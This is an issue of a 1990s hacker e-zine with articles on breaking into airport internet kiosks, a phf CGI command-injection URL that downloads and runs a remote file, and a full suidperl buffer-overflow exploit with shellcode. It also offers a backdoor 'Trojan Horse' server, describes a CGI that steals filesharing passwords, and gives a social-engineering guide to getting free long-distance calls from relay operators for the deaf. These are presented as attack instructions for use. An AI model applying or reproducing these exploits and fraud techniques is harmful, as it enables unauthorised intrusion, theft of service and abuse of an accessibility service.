_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0013 | | 1115.97 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward General Alphabetical Member Listing 817 2600 Meeting New CAU File Releases I)ruid Hacking GTE Cybercenters II I)ruid Manipulating Phf protocol The Truth About Windows Filesharing Crimson Assassin Exploit of the Month I)ruid Phreaking TDD Systems and You I)ruid Understanding A "T" Order FoneMan & broken- Closing ############################################################################## Foreward First of all, I would like to say that this issue of the CAU E-Zine is dedicated to Detectives Busker and Ware, of the Fort Worth Police Department. Thank's for being a couple of complete assholes and assuring us that our assumptions that Law Enforcement in the United States is nothing but a collection of close-minded gimps was correct and still holds true. I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Alphabetical Member Listing Handle IRC Nick E-Mail -------------------------------------------------------------- Crimson Assassin Crimson_A crimson@caughq.org I)ruid I}ruid druid@caughq.org Fizban Fizban^ fizban_cau@hotmail.com int3l int3l int3l@caughq.org Sublime sublime sublime@caughq.org uv uv_ uv817@hotmail.com -------------------------------------------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 817 2600 Meeting First Friday of Every Month 6:00pm until 9:00pm Cafe Cybre 481 Harwood Road Hurst, Texas Phone: METRO: 817.268.0060 So Be There!! I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% New CAU File Releases This month, I have released InfoBot version 1.0.0, an IRC bot designed to just do some random functions as well as greet people, define words for people, decimal to hex and decimal to binary conversion, and calculate equasions for people. Also I have released ServerCheck version 0.91 Beta, a System Administration utility most useful to those people that have those nifty alpha-numeric pagers with email addresses. ServerCheck is a client-server administrative application that causes an administrative machine contact multiple servers and check for certain processes to make sure they are running, definable by config file on the admin machine. ServerCheck also features encrypted data packets to communicate from client to server, to add a little more security to your network. I have also released this month, the CAU Encrypted Command-Line Server, which is basically a limited version of ssh with not as much fancy encryption. I just wanted to try my hand at client/server/user interaction, as well as create a usefull little Trojan Horse type program. As the filename suggests, this program also features encrypted data packets, and allows you to connect without login or password (allowing that the client you use can correctly handshake with the server) to any server on any given machine and execute single response command-line. Anyway, you can get all of these new releases from the CAU Ftp site, at ftp.caughq.org, or on the CAU Website at http://www.caughq.org. Betcha can't wait to see what you all get for Christmas (: I)ruid ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% GTE Cybercenters II Remember last month when I ( I)ruid ) wrote an article about the GTE Cybercenters in D/FW International Airport? If you liked that article, your gonna LOVE this one. I am writing this article, but this hack was mainly accomplished by int3l and myself, so he gets some credit too... (: I don't think either one of us could have done it alone, this was really a group effort, and that's what CAU is all about. Allright. If you remember correctly, last month (go read it) I stated that using the GTE Cybercenter's FREE STUFF menu, you could go to one of the free webpages that sets itself up in frames and has an infoseek search engine search field on it. Using this, you can work your way back to, say, www.yahoo.com, and use the main frame of the free website /as/ a webbrowser (targeted links to "_top" will not work). After writing last months article, I decided to sit down and code a few CGI's and put them up on my website, so that I could do things remotely while I was at the Cybercenter. I'll talk a little more about this in a little bit. Right now I want to talk about other things you can do while your in the browser. Other than being able to hop around links from page to page and basically be able to go anywhere you want on the web (as long as it's linked), I also decided to see what I could do with Java. I went to yahoo and searched for "IRC + Java", and then followed a few links until I found a site with a Java IRC client. The browser ran the applet, and in a few seconds, my friends were talking to me at the Airport. So, if your any good at coding Java or scripting Javascript, there's a WORLD of stuff you can do via the browser. And speaking of programming, that brings me to my next point: Good ol' CGI's. As I mentioned, the GTE Cybercenter's free browser didn't have a location bar, because they don't want you going anywhere other than the free site they sent you to. If your any good at programming, I'm sure you can write a simple CGI to emulate a location bar. So I sat down and in about 10 minutes had a working location bar, that would use META-HTTP EQUIV Refresh tags to "forward" you to whatever you typed in the html form "location bar." So that takes care of the location bar problem, and you now have a fully functional basic web browser. And while we're on CGI's, i'll let you in on a few other neat tricks. The next CGI I wrote was a simple environment variable displayer. All this CGI did was spew some html and told me the environment variables sent along with the http request. These included the Cybercenter's IP, Hostname, Browser Version (most were various versions of Mozilla, from 2.0 to 4.0), and so on. That is a bit of useful information. Another CGI I wrote was a samba server and smbclient based windows filesharing username and password grabber, which will tell me the workgroup name and login and password of the machine i'm viewing the page on, but the GTE Cybercenters were'nt set up for filesharing (at least not yet... hehheh...) so this didn't do much. The next CGI I wrote was meant to exploit the browser (MSIE 3.0 compatable) by forcing it to run various applications via the browser. It downloaded the desktop links the way it was supposed to, but the program that handles the GTE Cybercenter user interface seemed to have a wrapper that made alert box decisions FOR the user, thus preventing me from having the webpage run applications. And finally, the last cgi simply winnuked the machine that ran it. If you don't know what winnuke is, go to #windows and ask someone, and maybe they'll beat a clue into your thick skull. And yes, the GTE Cybercenters are winnukeable... happy happy day! Normally I would think that winnuking the GTE Cybercenter is lame and has no purpose, but here it was for the greater good. Because we could winnuke the machine, we could cause it to reboot by hitting ctrl-alt-del at the pretty Windows 95 blue error screen where it screams about VXD's and memory addresses. Once ctrl-alt-delete reboots the machine, you can then venture into the system CMOS, etc, as well as hit ctrl-F8 as windows is starting up (you gotta be quick, that damn GTE Cybercenter program starts up REAL quick) and get yourself into the Windows 95 boot menu. Now obvioulsy you realise that now you have a pretty good grip on the system. If you go into Command Prompt Only mode, you can then edit such files as WIN.INI and SYSTEM.INI, and get rid of that pesky Cybercenter interface that wants you to swipe a credit card before doing anything and replace it with the standard Windows 95 Interface (REM NEWSHELL=bleh bleh), or hell, a DOS interface if you want (MSDOS.SYS : GUI=0). Allright, now you have it booting to Windows95, and my my... what is that? Could that be a start bar? Now you basically have complete control over the system, and can execute any applications you want, all for free. You can also download and install anything you want (we'll talk about a few good suggestions in a second), and you can even change the desktop to a picture of your favorite bikini-clad sex-goddess or little furry hampster, whatever your prefrence should be. You can also turn on or off any preferences on the machine, such as windows filesharing, network neighborhood, etc. A good thing to do is set up Network Neighborhood and Fileshare out the machine's drives, accessable to everyone (or password it if you must, but may I remind you that information wants to be free... (: ). Now you can remotely map the machine's drives from your house or school using a windows box or smbclient for *nix. Another package you may want to install is the Netspy client program, and set up the Netspy server program (the Master) on your machine at home. You can now watch the machine in real time and see what it's doing, anytime you want. Another good idea is a Windows 95 Packet sniffer, such as PacketBoy (remember, you can map the machine from home and download the sniffer logs). You could also set up a Windows 95 webserver and host a website off of that machine (using filesharing to upload your page), or hell, install an ftp server program and upload that way. The possibilities are endless. And thus ends the Local section of this article. Obviously you can see the possibilities here. Now, what can we do remotely you ask? Not much unless you set up something, because the Cybercenters are on dynamic IP's through uu.net, and are pretty hard to find unless you have something mailing you or pinging you or something of that sort. But anyway, that's all for this article, on to something else. And something to leave you with, this very insightful fortune I got from Tia's Mexican Resteraunt in Little Rock Arkansas: "No dan, no quiten." I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Manipulating Phf Why? Just read on. Ok i saw what most people did with the PHF hole and i know it's considered an old hack but, i still thought there was something you could do that was more than just "cat /etc/passwd" i thought the things you want to do (usually) do not require you to crack the password file locally. Why not, if that was the thing you wanted to do, do it remotely. Thus the base idea is born. So first is method, how do i: 1 Get a program on a remote machine using as few holes or programs as possible. 2 Run the program on the remote machine and control it's execution. The first goal was achevied through "ncftp -a". It is a way to specify an arbitrary host and arbitrary file to d/l. The only requierment is that it be anonymously accesible. The second is almost trivial but needs attention to one thing, a place for the UID of the httpd to write. /tmp is the answer (Attention! This is the first use of a directory being used as the first word in a sentance. My English teacher would be so proud.). So the steps are: 1 cd to /tmp 2 ncftp -a HOST:FILE 3 chmod +x FILE 4 /tmp/FILE No prob. Now what does file contain? Well whatever you want, I have a sample script later in this article that sets up a user interface using HTML. Now you could set up a script that does one task and ends but, what fun is that? I thought getting root is just the outcome. The journey is the fun part, so what can the script do to add to my (your) enjoyment? Well for yourself you will have to answer that but, for me: 1 seeing who is on 2 seeing ps output 3 checking my UID (useful for some attacks if your UID is 65535) 4 viewing /etc/passwd (ok ok i know) 5 cracking /etc/password (mo better) 6 checking /var/adm/messages (hehe haven't found a password yet but, i'll keep trying) 7 this number intentionally left blank 8 makeing a file.lst and then gziping it and offering it as a link to d/l That's all for now but, if you think of other things either code them and mail them or just the idea to I)ruid. Protocol (the way to do things) [ EDITOR'S NOTE: Here's a quick example that came along with this article but was not included in the article. The servernames have been removed to protect the innocent, but I'm sure you'll get the idea. (: This is a long URL and had to be broken up, but normally this would be one long URL: ] http://:80/cgi-bin/phf?Jserver= &Qalias=%0acd%20/tmp%0ancftp%20-a%20%3agotcha%0a chmod%20%2bx%20gotcha%0a/tmp/gotcha %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% The Truth About Windows Filesharing Ok, lets face it people, the majority of computers being used and idleing on the Internet today are Windows 95 boxes. Sad but true. From past expericences in search of a phat unix box to play with, I, like most people, would just ignore them thinking that there is no logical way of getting into them (they are Windows 95 machines for GODZ SAKE!). Thats the kind of attidute I had and i think it is safe to say that the majority of people have. That all changed one day when I was installing a program called SAMBA on a linux box at work. Samba basically allows you to share files on the linux box with Windows 95/NT networks (thats the short def). A nice utility comes with SAMBA called 'smbclient'. This program basically allows you to browse shared drives on a remote computer, without doing all the shit that you have to do in Windows 95 to acomplish the same task. I started using the program on remote Windows 95 boxes and to my amazement, most of the Windows 95 boxes that were connected to the net had filesharing enabled, and I was able to browse their hard drives remotely from my linux box. Pretty neat utillity. All this is nothing new, Samba has been around for a while. Its just not known to many people that this can be done. The format is pretty simple and easy to understand. Go grab samba from the net at 'http://samba.anu.edu.au/samba/', compile it, and the file 'smbclient' is in the bin directory. There are some other things you can do with samba itself. Check the net for some resources. A good place to start is ntsecurity.net. They have a pretty good article on a problem with samba and win95 network passwords. Crimson Assassin [ EDITOR'S NOTE: Another good article related to this topic can be found here: 'http://199.103.168.8:4135/avian/papers/cifs.txt' This article was written by Hobbit - Also, I have implemented an example of the problem described on NTSecurity.com about grabbing passwords, which is located at 'http://www.cytlok.com/cgi-bin/cytlok.com/sectest' ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month Allright, this is a new feature of the CAU E-Zine, the exploit pick of the month! Basically this is just a replacement for the prefix scan of the month. We may bring back the scan of the month as they become available, I may start prefix scanning again, however, I would like to get some scans from other NPA's than just 817. I have a metro line to play with so I may be scanning some 214 and 972 WC's. This exploit appeared on the BugTraq mailing list on 11.13.95, and is written completely in Perl, to exploit Suidperl! I thought that was kina funny, so it became our "Exploit of the Month." Anyway, here's the exploit code, and it is also included seperately in the zine, named 'sperl_bufovr.pl'. And here's the exploit script: ---== (SNIP) #!/usr/bin/perl # yes, this suidperl exploit is in perl, isn't it wonderful? :) $| = 1; $shellcode = "\x90" x 512 . # nops "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp # "standard shellcode" by Aleph One "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" . "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" . "\x80\xe8\xdc\xff\xff\xff/bin/sh"; # start and end of .data # adjust this using /proc/*/maps $databot = 0x080a2000; $datatop = 0x080ab000; # trial and error loop $address = $databot + 4; while ($address < $datatop) { $smash_me = $shellcode . ('A' x (2052 - length($shellcode))) . (pack("l", $address) x 1000) . ('B' x 1000); $pid = fork(); if (!$pid) { exec('/usr/bin/sperl5.003', $smash_me); } else { wait; if ($? == 0) { printf("THE MAGIC ADDRESS WAS %08x\n", $address); exit; } } $address += 128; } ---== (SNIP) This exploit is supposed to work on Intel-based Linux systems with suidperl. Have fun and be good... I)ruid ############################################################################## Phreaking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% TDD Systems and You If you will remember way back in CAU E-zine issue Number 2 or so, we allowed 0mega to put in a VERY small article about TDD. Let's just say that that little bit of fluff text really sucked. So here, in a little more detail and hopefully a lot more style, is another article about TDD Systems in your area and what you can use them for, or what you can make them do. First of all, it helps to have the TDD/TTY (Terminal for the Deaf and Dumb) telephone number and data number for terminals. The easiest way to get the latter is to simply open your local telephone book and thumb through the first couple of pages where emergency numbers and such are found. Normally there will be an entry on one of these pages that simply says "TDD/TTY terminals for the Deaf 1-800-etc..." or will have a local number instead of a 1-800 number. If your area uses a toll free 1-800 number, these systems will be a little more useful to you than a local number, especially if your calling from a TDD terminal in a public facility such as an airport or mall, which may require you to insert a quarter for a local call or some other fee. The second number that is useful to you is the voice telephone number for TDD Operators. Just to clarify, the Data number allows you to dial in via data terminal to the operators, and have them connect you with a live person. The Voice number allows you to call an operator, and have them connect you with a data terminal. If you don't know anything about TDD Systems, this may sound a little confusing. How do I talk voice to a data terminal you ask? Here's how it works: When you first dial the Data number, an operator will begin typing to you. I'll get into the actual acronyms and id numbers and such a little later, we'll be general here. So the operator tells you who he or she is, and you are allowed to type back and forth to the operator... usually at the beginning of your session, you will POLITELY ask the operator to dial a number for you. They will be happy to connect you to any voice number anywhere usually, at no cost to you. The TDD Operator will then tell you that the number you dialed is ringing, etc... and inform you when it is answered. The TDD Operator will now tell you to hold on a minute, while he or she explains to the live person what exactly is going on. Basically, from then on, everything you type into the terminal is relayed via the TDD Operator to the live person, and whatever the live person says to the TDD Operator will be typed into the terminal for you to see. Usually the TDD Operator's job is to be totally transparent in the conversation, and not respond as an individual. For example, if you type into the terminal "I have large breasts", the TDD Operator will actually say "I have large breasts." Now, as you can probably imagine, this can be hours and hours of fun for you and the whole family, simply making your loving TDD Operator say very interesting things. Also you have probably figured out that you can call the Voice TDD Line and have them call your friend's computer and type stuff to him or her. Another option is to have the TDD Operator connect you data to data. Normally they will not do this, assuming that if you have a terminal you could dial the other terminal directly, but they DO have the ability to do this for you. All of this can be great fun, but that's not what I find most interesting about it. What I find useful is that most TDD Operators (given you are extremely polite) will connect you with any phone number you give them, long distance or local. I've even gotten TDD Operators to dial overseas calls 2 out of 5 times. The trick is really to just be extremely polite and assume the role of a deaf veteran or other hearing-impaired individual that really dosn't know much about computers, and even less about their own TDD terminal. However, you can't be too ignorant about it, or they will figure out sooner or later that you really are not deaf and your just trying to get a free long distance phone call to your friend Malikai in Chicago. For example, after everything you type, you must type "GA" (Go Ahead) so that your TDD Operator knows that you are finished typeing and it's time for them to relay the message. Another common and useful acronym to use in the TDD System is NBR, which stands for Number (brilliant, huh?) Another thing to remember, is that there may not be that many deaf people in your area, and usually a TDD Operator room is only staffed with two or three Operators. As much as we would like them to be, these Operators are usually not extremely stupid, and will figure out (especially if you call them over and over and over) your style of typing and such and also catch on to you that way. I find that varrying how you ask to dial the number usually throws them off. For example: Please dial 817xxxxxxx GA Could you please dial 817-xxx-xxxx for me? GA Dial 817.xxx.xxxx for me please GA and Jo' main... i gotz tew kall muh homie at eight-one-seven...etc If you will notice i varied the placement of the number in my request and the number delimeters for each request. If you ask the same way every time, they will catch on and begin denying your requests, or if you are in a public place, begin to reqest that you insert coinage or some other form of monitary payment. Once again, I can't stress enough the importance of being EXTREMELY polite. These Operators can be real difficult if you don't say please and thank you and use other proper etiquette such as that. Also don't come right out and ask them to dial a number for you. Both you and they know that that is why you called, and that is what evenually will come up. Some Operators respond extremely well to small talk, even things as simple as "Hello, how are you today?" They will say "I'm doing fine, thank you... can I dial a number for you?" and your good to go. And just a cautious note, if you curse at them, they will usually hang up on you, or at least be very mean to you. However, once they have connected you to the number you are dialing, and their only concern is to relay what is said back and forth, you can say whatever you damn well please and they can't say anything about it. In a final note, please remember that TDD is meant for the hearing-impaired, and this service should in NO WAY be abused. In fact, I rarely use it, and only from public places such as the Airport when I really need to make a phone call, or occasionally at a party when we feel like making a female TDD Operator tell us she has large breasts. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Understanding The Assignment Area From A "T" Order In this article I'm going to show you how to read and understand the assignment area from a "T" order. First I'll blow up an example of an assignment area and then break it down into smaller portions so it's easier to understand. Let's have a look at the entire assignment area: ---ASGM G1 TN 708 304 1250 FA 520 SHORELY DR, BARINGTN, IL /LOC APT 101/RT 1005/RZ 13 IOE 01010-011-30/EXK 708 381/TN 708 304-1250/LPS/DF F10-04- 064C/OAB KAY G2 WC 708 381/CT IF1 /CA 25/PR 2324/DF F10-04-106V /PRQ N/BP G-W+V-BR/OPC BL-R+W- BL/TEA CP200 E NW HWY; EXJ /TPR 111613 RO ORD F004546723 DD 95-06- 12IF2 /CA 200N/PR 126/BP 1/TEA IT 520 SHORELY DR; CIW Okay, now you're probably looking at that wondering what the hell it all means. The G1 area shows the phone number for the following cable and pair assignment. Yes, that's right, that TN stands for Telephone Number. Wow, it's that easy FoneMan? Damn straight. The FA part of the assignment contains the destination address. Obviously if the town name is too large they're going to abbreviate it like the example above. See? This isn't that hard :) The G2 line is very important. The first part shows the wire center. Wow, there's another one of those acronyms, that's right, WC stands for Wire Center. Often the Telco will refer to the WC as the EWO. If you see CT in the second part, that means it's a cut-through. Wow FoneMan, this shit is easy! The IF1 section gives details about the cable that leaves the CO. In this case, the new service leaves on cable 25, and pair 2324. This cable runs to a Cross Box at 200 E. Northwest Hightway(TEA). To connect this cable to the next leg of cable, the tech will connect the white-striped green wire (from the F1 cable) to the red-striped blue wire (of the F2 cable) and the brown-striped violet wire (F1) to the black-striped white wire (F2). Actually, this is already done in this case. You can tell by the EXJ (EXisting cross-connect Jumper) after the semicolon. Well that's pretty much it. I hope this article has helped you some. The person reading this should have a basic knowledge of phones to understand things such as cable, pair, wire center, etc. This is one of the few articles I write about phreaking, or anything for that matter, so enjoy. Peace out. FoneMan broken- ############################################################################## Closing Well, that's it for the November issue... A MUCH better issue than we've had in the past. Next month will be the Christmas issue, oh what fun! That means we all get presents or something... Well Anyway, hope you enjoy your turkey and stuffing, and If you don't celebrate Thanksgiving, whatever you happen to be eating on the day we call Thanksgiving... And on a final note, I am now making an effort to be at EVERY Ft. Worth 2600 meeting at Cafe Cybre because attendance has been null, probably because no one shows up and they realize that noone else is there for 2600... well, You can't miss me, I wear a bright green trench coat... check out the CAU Website (http://www.caughq.org) for details on when and where the Ft. Worth 2600 meeting is held, or look at the top of this zine. So you can be sure that at least one person will be there for the Ft. Worth 2600 meeting... and when I'm there, other people usually show up, so i'll see you there. I'd also like to remind everyone of the 3 email addresses set up to support this e-zine, 'articles@caughq.org', 'letters@caughq.org', and 'zine@caughq.org' used for article submissions, letters to previous authors or the editor, and general email, respectively. I)ruid ############################################################################## ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground